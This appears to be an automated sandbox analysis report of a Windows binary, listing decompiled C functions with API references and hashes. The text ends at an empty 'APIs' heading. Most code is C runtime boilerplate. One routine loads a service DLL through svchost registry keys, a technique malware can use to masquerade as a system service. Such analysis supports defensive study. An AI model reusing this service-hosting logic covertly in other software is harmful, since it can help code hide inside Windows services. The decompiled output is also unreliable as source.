                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 5d40c689e1ac2f09ef9792fa887dbd7acda1dc2fc7d2ee4e6ed46eba9ac5ff27
                            • Instruction ID: 3656b69047e99df73e95d7613f21e9593f2662a4caeb853ae72a10ee072b9db6
                            • Opcode Fuzzy Hash: 5d40c689e1ac2f09ef9792fa887dbd7acda1dc2fc7d2ee4e6ed46eba9ac5ff27
                            • Instruction Fuzzy Hash: F9B09235044308BBCB002B99EC0AB59BF2DFB05652F004121F60D44071EB7254108A91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E008B40F0(_Unknown_base(*)()* _a4) {
                            
                            				return SetUnhandledExceptionFilter(_a4);
                            			}

                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(?,?,008B2A50,008B2A05), ref: 008B40F6
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 0f0f0aba76817cd017d4abe50258118c7133344f0810143abd1cf0f77c427edb
                            • Instruction ID: 84a3f6a4072d0a4f9fbd3a5d6d00896e2b0abd06702243dbaf1acfe37c9f66cb
                            • Opcode Fuzzy Hash: 0f0f0aba76817cd017d4abe50258118c7133344f0810143abd1cf0f77c427edb
                            • Instruction Fuzzy Hash: A1A0113000020CBB8B002B8AEC0A88ABF2CFA002A0B000020F80C00020EB22A8208A80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E008B1160(WCHAR* _a4, WCHAR** _a8) {
                            				void* _v8;
                            				void* _v12;
                            				long _v16;
                            				struct HINSTANCE__* _v20;
                            				void* _v24;
                            				signed int _v28;
                            				WCHAR* _v32;
                            				_Unknown_base(*)()* _v36;
                            				void* _v40;
                            				int _v44;
                            				long _v48;
                            				int _t82;
                            				int _t83;
                            				int _t85;
                            				int _t86;
                            				long _t125;
                            				void* _t134;
                            
                            				_v12 = 0;
                            				_v8 = 0;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v24 = 0;
                            				_v20 = 0;
                            				_v36 = 0;
                            				_v48 = 0;
                            				_t82 = lstrlenW(L"System\\CurrentControlSet\\Services");
                            				_t83 = lstrlenW("\\");
                            				_t85 = lstrlenW(_a4);
                            				_t86 = lstrlenW("\\");
                            				_t11 = lstrlenW(L"Parameters") + 1; // 0x1
                            				_v28 = _t82 + _t83 + _t85 + _t86 + _t11;
                            				_v8 = HeapAlloc(GetProcessHeap(), 0, _v28 << 1);
                            				lstrcpyW(_v8, L"System\\CurrentControlSet\\Services");
                            				lstrcatW(_v8, "\\");
                            				lstrcatW(_v8, _a4);
                            				lstrcatW(_v8, "\\");
                            				lstrcatW(_v8, L"Parameters");
                            				 *((short*)(_v8 + _v28 * 2 - 2)) = 0;
                            				_v16 = RegOpenKeyExW(0x80000002, _v8, 0, 0x20019,  &_v12);
                            				if(_v16 == 0) {
                            					_v40 = E008B1000(_v12, L"ServiceDll");
                            					if(_v40 != 0) {
                            						_v32 = E008B10B0(_v40);
                            						if(_v32 != 0) {
                            							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, 0,  &_v44);
                            							if(_v16 != 0) {
                            								L10:
                            								RegCloseKey(_v12);
                            								_v20 = LoadLibraryExW(_v32, 0, 8);
                            								if(_v20 != 0) {
                            									if(_v24 == 0) {
                            										_v36 = GetProcAddress(_v20, "ServiceMain");
                            									} else {
                            										_v36 = GetProcAddress(_v20, _v24);
                            									}
                            									if(_v36 != 0) {
                            										GetProcAddress(_v20, "SvchostPushServiceGlobals");
                            										 *_a8 = _a4;
                            										_a8[1] = _v36;
                            										_v48 = 1;
                            									} else {
                            										FreeLibrary(_v20);
                            									}
                            								} else {
                            									_t125 = GetLastError();
                            									0x8b0000(_v32, _t125);
                            									0x8b0000("failed to load library %s, err=%u\n", _t125);
                            								}
                            								goto L18;
                            							}
                            							_v28 = _v44 + 1;
                            							_v24 = HeapAlloc(GetProcessHeap(), 0, _v28);
                            							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, _v24,  &_v44);
                            							if(_v16 == 0) {
                            								 *((char*)(_v24 + _v28 - 1)) = 0;
                            								goto L10;
                            							}
                            							RegCloseKey(_v12);
                            							goto L18;
                            						}
                            						RegCloseKey(_v12);
                            						goto L18;
                            					}
                            					RegCloseKey(_v12);
                            					goto L18;
                            				} else {
                            					_t134 = _v8;
                            					0x8b0000(_t134, _v16);
                            					0x8b0000("cannot open key %s, err=%d\n", _t134);
                            					L18:
                            					HeapFree(GetProcessHeap(), 0, _v8);
                            					HeapFree(GetProcessHeap(), 0, _v40);
                            					HeapFree(GetProcessHeap(), 0, _v32);
                            					HeapFree(GetProcessHeap(), 0, _v24);
                            					return _v48;
                            				}
                            			}

                            APIs
                            • lstrlenW.KERNEL32(System\CurrentControlSet\Services), ref: 008B11A4
                            • lstrlenW.KERNEL32(008C2048), ref: 008B11B1
                            • lstrlenW.KERNEL32(00000000), ref: 008B11BD
                            • lstrlenW.KERNEL32(008C204C), ref: 008B11CA
                            • lstrlenW.KERNEL32(Parameters), ref: 008B11D7
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B11EC
                            • HeapAlloc.KERNEL32(00000000), ref: 008B11F3
                            • lstrcpyW.KERNEL32 ref: 008B1205
                            • lstrcatW.KERNEL32(00000000,008C2068), ref: 008B1214
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 008B1222
                            • lstrcatW.KERNEL32(00000000,008C206C), ref: 008B1231
                            • lstrcatW.KERNEL32(00000000,Parameters), ref: 008B1240
                            • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 008B1267
                            • RegCloseKey.ADVAPI32(00000000), ref: 008B12AE
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1400
                            • HeapFree.KERNEL32(00000000), ref: 008B1407
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1413
                            • HeapFree.KERNEL32(00000000), ref: 008B141A
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1426
                            • HeapFree.KERNEL32(00000000), ref: 008B142D
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1439
                            • HeapFree.KERNEL32(00000000), ref: 008B1440
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$Processlstrlen$Freelstrcat$AllocCloseOpenlstrcpy
                            • String ID: Parameters$Parameters$ServiceDll$ServiceMain$ServiceMain$ServiceMain$SvchostPushServiceGlobals$System\CurrentControlSet\Services$cannot open key %s, err=%d$failed to load library %s, err=%u
                            • API String ID: 922840199-2032176762
                            • Opcode ID: e54949b3b39b7d5b75a7b2b24a55c6f236abaac2cc20b02731b8c31fdeb0759b
                            • Instruction ID: 546e82ee9e0dd8c2eb5b87843333ba4a74397b89cb68e9d7899910110b0f6c77
                            • Opcode Fuzzy Hash: e54949b3b39b7d5b75a7b2b24a55c6f236abaac2cc20b02731b8c31fdeb0759b
                            • Instruction Fuzzy Hash: 5D91D575900608FFDB04EBE4D859BAEBBB4FB48701F108619E611AA390E7799942CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 43%
                            			E008B15A0(intOrPtr _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _v16;
                            				long _t19;
                            				long _t22;
                            
                            				_v16 = 0;
                            				_v12 = 0;
                            				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0x20019,  &_v16);
                            				_v8 = _t19;
                            				if(_v8 == 0) {
                            					_v12 = E008B1000(_v16, _a4);
                            					_t22 = RegCloseKey(_v16);
                            					if(_v12 != 0) {
                            						_v8 = E008B1450(_v12);
                            						if(_v8 == 0) {
                            							HeapFree(GetProcessHeap(), 0, _v12);
                            						}
                            						return _v8;
                            					}
                            					0x8b0000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");
                            					0x8b0000(_a4, _t22);
                            					0x8b0000("cannot find registry value %s in %s\n", _t22);
                            					return 0;
                            				}
                            				0x8b0000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", _v8);
                            				0x8b0000("cannot open key %s, err=%d\n", _t19);
                            				return 0;
                            			}

                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 008B15C9
                            • RegCloseKey.ADVAPI32(00000000), ref: 008B1609
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: CloseOpen
                            • String ID: Software\Microsoft\Windows NT\CurrentVersion\Svchost$cannot find registry value %s in %s$cannot open key %s, err=%d
                            • API String ID: 47109696-3561747105
                            • Opcode ID: 3c0f57dbee30938cfa04a7d1680dac99ad642129c4f36389cc26d1f35aa297fc
                            • Instruction ID: 56a1e3bfe9471b6b6cbd39db1b112954e74d6aeb04a3b6ac16928930317e271f
                            • Opcode Fuzzy Hash: 3c0f57dbee30938cfa04a7d1680dac99ad642129c4f36389cc26d1f35aa297fc
                            • Instruction Fuzzy Hash: CD11F97494020CFFDB04FBA8C85AFDEB778FB44701F208158B615EA391EA74AA419B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E008B2E1E(void* __ebx, void* __edi, void* __eflags) {
                            				void* __esi;
                            				void* _t3;
                            				intOrPtr _t6;
                            				long _t14;
                            				long* _t27;
                            
                            				E008B2FCD(_t3);
                            				if(E008B4268() != 0) {
                            					_t6 = E008B3D79(E008B2BAF);
                            					 *0x8c21a8 = _t6;
                            					__eflags = _t6 - 0xffffffff;
                            					if(_t6 == 0xffffffff) {
                            						goto L1;
                            					} else {
                            						_t27 = E008B42EE(1, 0x3bc);
                            						__eflags = _t27;
                            						if(_t27 == 0) {
                            							L6:
                            							E008B2E94();
                            							__eflags = 0;
                            							return 0;
                            						} else {
                            							__eflags = E008B3DD5( *0x8c21a8, _t27);
                            							if(__eflags == 0) {
                            								goto L6;
                            							} else {
                            								_push(0);
                            								_push(_t27);
                            								E008B2D6B(__ebx, __edi, _t27, __eflags);
                            								_t14 = GetCurrentThreadId();
                            								_t27[1] = _t27[1] | 0xffffffff;
                            								 *_t27 = _t14;
                            								__eflags = 1;
                            								return 1;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					E008B2E94();
                            					return 0;
                            				}
                            			}

                            APIs
                            • __init_pointers.LIBCMT ref: 008B2E1E
                              • Part of subcall function 008B2FCD: RtlEncodePointer.NTDLL(00000000,?,008B2E23,008B28F2,008C10E8,00000014), ref: 008B2FD0
                              • Part of subcall function 008B2FCD: __initp_misc_winsig.LIBCMT ref: 008B2FEB
                              • Part of subcall function 008B2FCD: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008B3E6C
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008B3E80
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008B3E93
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008B3EA6
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008B3EB9
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008B3ECC
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008B3EDF
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008B3EF2
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008B3F05
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008B3F18
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008B3F2B
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008B3F3E
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008B3F51
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008B3F64
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008B3F77
                              • Part of subcall function 008B2FCD: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008B3F8A
                            • __mtinitlocks.LIBCMT ref: 008B2E23
                            • __mtterm.LIBCMT ref: 008B2E2C
                              • Part of subcall function 008B2E94: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,008B2E31,008B28F2,008C10E8,00000014), ref: 008B4182
                              • Part of subcall function 008B2E94: _free.LIBCMT ref: 008B4189
                              • Part of subcall function 008B2E94: DeleteCriticalSection.KERNEL32(008C21F8,?,?,008B2E31,008B28F2,008C10E8,00000014), ref: 008B41AB
                            • __calloc_crt.LIBCMT ref: 008B2E51
                            • __initptd.LIBCMT ref: 008B2E73
                            • GetCurrentThreadId.KERNEL32 ref: 008B2E7A
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            • Opcode ID: 0a46203e29b401d771f330d4ac0b9b2cb424d10270605e33fc8090a9054c827d
                            • Instruction ID: 09fe444c1aebb2a8687c7674bbef77b9404be5afba650a76ccdb69acaa45b875
                            • Opcode Fuzzy Hash: 0a46203e29b401d771f330d4ac0b9b2cb424d10270605e33fc8090a9054c827d
                            • Instruction Fuzzy Hash: 45F06D3251961269E23876B97C036CB3B90FF01731B25066AF4A0D93D7EE20D8428162
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E008B1000(void* _a4, short* _a8) {
                            				void* _v8;
                            				long _v12;
                            				unsigned int _v16;
                            				int _v20;
                            				int _v24;
                            
                            				_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, 0,  &_v20);
                            				if(_v12 == 0) {
                            					_v16 = _v20 + 4;
                            					_v8 = HeapAlloc(GetProcessHeap(), 0, _v16);
                            					_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, _v8,  &_v20);
                            					if(_v12 == 0) {
                            						 *((short*)(_v8 + (_v16 >> 1) * 2 - 2)) = 0;
                            						 *((short*)(_v8 + (_v16 >> 1) * 2 - 4)) = 0;
                            						return _v8;
                            					}
                            					HeapFree(GetProcessHeap(), 0, _v8);
                            					return 0;
                            				}
                            				return 0;
                            			}

                            APIs
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008B101A
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B103C
                            • HeapAlloc.KERNEL32(00000000), ref: 008B1043
                            • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?), ref: 008B1062
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B1077
                            • HeapFree.KERNEL32(00000000), ref: 008B107E
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$ProcessQueryValue$AllocFree
                            • String ID:
                            • API String ID: 1095795037-0
                            • Opcode ID: 596399a6c9f5ebfb5015de35b7ff9ff0692838117a0cfafc91950adf077d6d6d
                            • Instruction ID: c82e3efd7b83f8e584ea1e2c8a59bc8ad1aacf441dc26026e660beaa5907b78e
                            • Opcode Fuzzy Hash: 596399a6c9f5ebfb5015de35b7ff9ff0692838117a0cfafc91950adf077d6d6d
                            • Instruction Fuzzy Hash: 0B21EA75A14608FFDB04EFE8D959FAEB7B8FF48300F108559E606DB290D6309A46CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E008B2EB1(void* __ecx, intOrPtr _a4) {
                            				struct HINSTANCE__* _v8;
                            				_Unknown_base(*)()* _t4;
                            
                            				_t4 =  &_v8;
                            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                            				if(_t4 != 0) {
                            					_t4 = GetProcAddress(_v8, "CorExitProcess");
                            					if(_t4 != 0) {
                            						return  *_t4(_a4);
                            					}
                            				}
                            				return _t4;
                            			}






                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,008B2EF0,00000000,?,008B6374,000000FF,0000001E,00000000,00000000,00000000,?,008B434C), ref: 008B2EC0
                            • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 008B2ED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 1646373207-1276376045
                            • Opcode ID: 556da015f82434fe8e8f26a93720ebd94dc289d8205d3e6366e4ff19fba03a77
                            • Instruction ID: 17c6bd8c73dd649e14282f36a3475105b85eb038516799d2c43be7428d088892
                            • Opcode Fuzzy Hash: 556da015f82434fe8e8f26a93720ebd94dc289d8205d3e6366e4ff19fba03a77
                            • Instruction Fuzzy Hash: 7CD01231240308BBDF50ABA2DC05FAE7BACFB04741F000165BD18D4351FA61DE519661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E008B853A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v8;
                            				intOrPtr _v12;
                            				int _v20;
                            				int _t35;
                            				int _t38;
                            				intOrPtr* _t44;
                            				int _t47;
                            				short* _t49;
                            				intOrPtr _t50;
                            				intOrPtr _t54;
                            				int _t55;
                            				int _t59;
                            				char* _t62;
                            
                            				_t62 = _a8;
                            				if(_t62 == 0) {
                            					L5:
                            					return 0;
                            				}
                            				_t50 = _a12;
                            				if(_t50 == 0) {
                            					goto L5;
                            				}
                            				if( *_t62 != 0) {
                            					E008B473F( &_v20, _a16);
                            					_t35 = _v20;
                            					__eflags =  *(_t35 + 0xa8);
                            					if( *(_t35 + 0xa8) != 0) {
                            						_t38 = E008B847C( *_t62 & 0x000000ff,  &_v20);
                            						__eflags = _t38;
                            						if(_t38 == 0) {
                            							__eflags = _a4;
                            							_t59 = 1;
                            							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                            							if(__eflags != 0) {
                            								L21:
                            								__eflags = _v8;
                            								if(_v8 != 0) {
                            									_t54 = _v12;
                            									_t31 = _t54 + 0x70;
                            									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                            									__eflags =  *_t31;
                            								}
                            								return _t59;
                            							}
                            							L20:
                            							_t44 = E008B5065(__eflags);
                            							_t59 = _t59 | 0xffffffff;
                            							__eflags = _t59;
                            							 *_t44 = 0x2a;
                            							goto L21;
                            						}
                            						_t59 = _v20;
                            						__eflags =  *(_t59 + 0x74) - 1;
                            						if( *(_t59 + 0x74) <= 1) {
                            							L15:
                            							__eflags = _t50 -  *(_t59 + 0x74);
                            							L16:
                            							if(__eflags < 0) {
                            								goto L20;
                            							}
                            							__eflags = _t62[1];
                            							if(__eflags == 0) {
                            								goto L20;
                            							}
                            							L18:
                            							_t59 =  *(_t59 + 0x74);
                            							goto L21;
                            						}
                            						__eflags = _t50 -  *(_t59 + 0x74);
                            						if(__eflags < 0) {
                            							goto L16;
                            						}
                            						__eflags = _a4;
                            						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                            						_t59 = _v20;
                            						__eflags = _t47;
                            						if(_t47 != 0) {
                            							goto L18;
                            						}
                            						goto L15;
                            					}
                            					_t55 = _a4;
                            					__eflags = _t55;
                            					if(_t55 != 0) {
                            						 *_t55 =  *_t62 & 0x000000ff;
                            					}
                            					_t59 = 1;
                            					goto L21;
                            				}
                            				_t49 = _a4;
                            				if(_t49 != 0) {
                            					 *_t49 = 0;
                            				}
                            				goto L5;
                            			}

















                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B8570
                            • __isleadbyte_l.LIBCMT ref: 008B859E
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B85CC
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B8602
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 53cb8a3ac95fc5bb6975a3e2da26e18b3decc3f4ecc540f6c83a9437afa0feff
                            • Instruction ID: 0a565f81a7d384f021c554f9ac702528e0ac5936fcd48a0797760e4dba859378
                            • Opcode Fuzzy Hash: 53cb8a3ac95fc5bb6975a3e2da26e18b3decc3f4ecc540f6c83a9437afa0feff
                            • Instruction Fuzzy Hash: D4318D3160024AEFDB319F69C849BEB7BA9FF41311F154529E865C72A1EB30D891DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E008B63D9(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                            				void* _t7;
                            				long _t8;
                            				intOrPtr* _t9;
                            				intOrPtr* _t12;
                            				long _t20;
                            				long _t31;
                            
                            				if(_a4 != 0) {
                            					_t31 = _a8;
                            					__eflags = _t31;
                            					if(_t31 != 0) {
                            						_push(__ebx);
                            						while(1) {
                            							__eflags = _t31 - 0xffffffe0;
                            							if(_t31 > 0xffffffe0) {
                            								break;
                            							}
                            							__eflags = _t31;
                            							if(_t31 == 0) {
                            								_t31 = _t31 + 1;
                            								__eflags = _t31;
                            							}
                            							_t7 = HeapReAlloc( *0x8c329c, 0, _a4, _t31);
                            							_t20 = _t7;
                            							__eflags = _t20;
                            							if(_t20 != 0) {
                            								L17:
                            								_t8 = _t20;
                            							} else {
                            								__eflags =  *0x8c40d0 - _t7;
                            								if(__eflags == 0) {
                            									_t9 = E008B5065(__eflags);
                            									 *_t9 = E008B5078(GetLastError());
                            									goto L17;
                            								} else {
                            									__eflags = E008B5360(_t7, _t31);
                            									if(__eflags == 0) {
                            										_t12 = E008B5065(__eflags);
                            										 *_t12 = E008B5078(GetLastError());
                            										L12:
                            										_t8 = 0;
                            										__eflags = 0;
                            									} else {
                            										continue;
                            									}
                            								}
                            							}
                            							goto L14;
                            						}
                            						E008B5360(_t6, _t31);
                            						 *((intOrPtr*)(E008B5065(__eflags))) = 0xc;
                            						goto L12;
                            					} else {
                            						E008B42B6(_a4);
                            						_t8 = 0;
                            					}
                            					L14:
                            					return _t8;
                            				} else {
                            					return E008B6347(__ebx, __edx, __edi, _a8);
                            				}
                            			}










                            APIs
                            • _free.LIBCMT ref: 008B63F8
                              • Part of subcall function 008B6347: __FF_MSGBANNER.LIBCMT ref: 008B635E
                              • Part of subcall function 008B6347: __NMSG_WRITE.LIBCMT ref: 008B6365
                              • Part of subcall function 008B6347: RtlAllocateHeap.NTDLL(010E0000,00000000,00000001,00000000,00000000,00000000,?,008B434C,00000000,00000000,00000000,00000000,?,008B4201,00000018,008C11B8), ref: 008B638A
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: 72101d7072e8f49c94a4c05893425f4b86e4cef35ca351fe5f5d5623a18b0df1
                            • Instruction ID: 5ed14fd9dd8a0b4bc5c1a59fdb5e1a04899b06c7bdf25c33e0311d1cce1d102a
                            • Opcode Fuzzy Hash: 72101d7072e8f49c94a4c05893425f4b86e4cef35ca351fe5f5d5623a18b0df1
                            • Instruction Fuzzy Hash: 4311AC31504E15ABCB213F78AC457DA37D4FF04764F144529F909D6351FF39C861869A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E008B9DAD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                            				intOrPtr _t25;
                            				void* _t26;
                            
                            				_t25 = _a16;
                            				if(_t25 == 0x65 || _t25 == 0x45) {
                            					_t26 = E008BA2FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                            					goto L9;
                            				} else {
                            					_t35 = _t25 - 0x66;
                            					if(_t25 != 0x66) {
                            						__eflags = _t25 - 0x61;
                            						if(_t25 == 0x61) {
                            							L7:
                            							_t26 = E008B9E33(_a4, _a8, _a12, _a20, _a24, _a28);
                            						} else {
                            							__eflags = _t25 - 0x41;
                            							if(__eflags == 0) {
                            								goto L7;
                            							} else {
                            								_t26 = E008BA579(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                            							}
                            						}
                            						L9:
                            						return _t26;
                            					} else {
                            						return E008BA4B8(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                            					}
                            				}
                            			}






                            APIs
                            Memory Dump Source
